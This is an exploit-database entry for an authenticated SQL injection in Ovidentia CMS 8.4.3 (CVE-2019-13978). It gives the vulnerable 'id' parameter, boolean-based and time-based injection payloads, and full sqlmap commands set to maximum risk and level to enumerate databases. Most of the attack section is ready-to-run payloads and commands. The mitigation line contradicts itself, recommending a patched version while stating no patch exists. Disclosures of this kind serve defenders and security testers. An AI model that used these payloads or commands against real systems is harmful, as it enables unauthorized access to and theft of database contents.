header-logo
Suggest Exploit
vendor:
Ovidentia CMS
by:
Fernando Pinheiro (n3k00n3), Victor Flores (UserX)
8.8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Ovidentia CMS
Affected Version From: 8.4.2003
Affected Version To: 8.4.2003
Patch Exists: NO
Related CWE: CVE-2019-13978
CPE: a:ovidentia_cms:ovidentia:8.4.3
Metasploit:
Other Scripts:
Platforms Tested: Mac, Linux (Firefox, Safari)
2019

Ovidentia CMS – SQL Injection (Authenticated)

The Ovidentia CMS version 8.4.3 is vulnerable to SQL Injection. An attacker can exploit this vulnerability by manipulating the 'id' parameter in the '/ovidentia/index.php?tg=delegat&idx=mem&id=1' path. This allows the attacker to execute arbitrary SQL queries and potentially gain unauthorized access to the database.

Mitigation:

The vendor has not provided a specific mitigation for this vulnerability. It is recommended to update to a patched version of the Ovidentia CMS.
Source

Exploit-DB raw data:

#-------------------------------------------------------
# Exploit Title: [ Ovidentia CMS - SQL Injection (Authenticated) ]
# Date: [ 06/05/2019 ]
# CVE: [ CVE-2019-13978 ]
# Exploit Author:
# [ Fernando Pinheiro (n3k00n3) ]
# [ Victor Flores (UserX) ]
# Vendor Homepage: [
https://www.ovidentia.org/
]
# Version: [ 8.4.3 ]
# Tested on: [ Mac,linux - Firefox, safari ]
# Download [
http://en.ovidentia.org/index.php?tg=fileman&sAction=getFile&id=17&gr=Y&path=Downloads%2FDistributions&file=ovidentia-8-4-3.zip&idf=893
]
#
#           [ Kitsun3Sec Research Group ]
#--------------------------------------------------------

POC

Path: /ovidentia/index.php?tg=delegat&idx=mem&id=1
Type: GET
Vulnerable Field: id
Payload:
		1. tg=delegat&idx=mem&id=1 AND 3152=(SELECT (CASE WHEN (3152=3152) THEN 3152 ELSE (SELECT 9962 UNION SELECT
		2. tg=delegat&idx=mem&id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))QwTg)

URL:
https://target/ovidentia/index.php?tg=delegat&idx=mem&id=1
Using Request file
sqlmap.py -r req --random-agent --risk 3 --level 5 --dbms=mysql -p id --dbs

Using Get
./sqlmap.py -u
[http://target/ovidentia/index.php\?tg\=delegat\&idx\=mem\&id\=1](http://target/ovidentia/index.php/?tg\=delegat\&idx\=mem\&id\=1)
--cookie "Cookie: OV1364928461=6kb5jvu7f6lg93qlo3vl9111f8" --random-agent --risk 3 --level 5 --dbms=mysql -p id --dbs

Navigation

Suggest Exploit

Services By CQR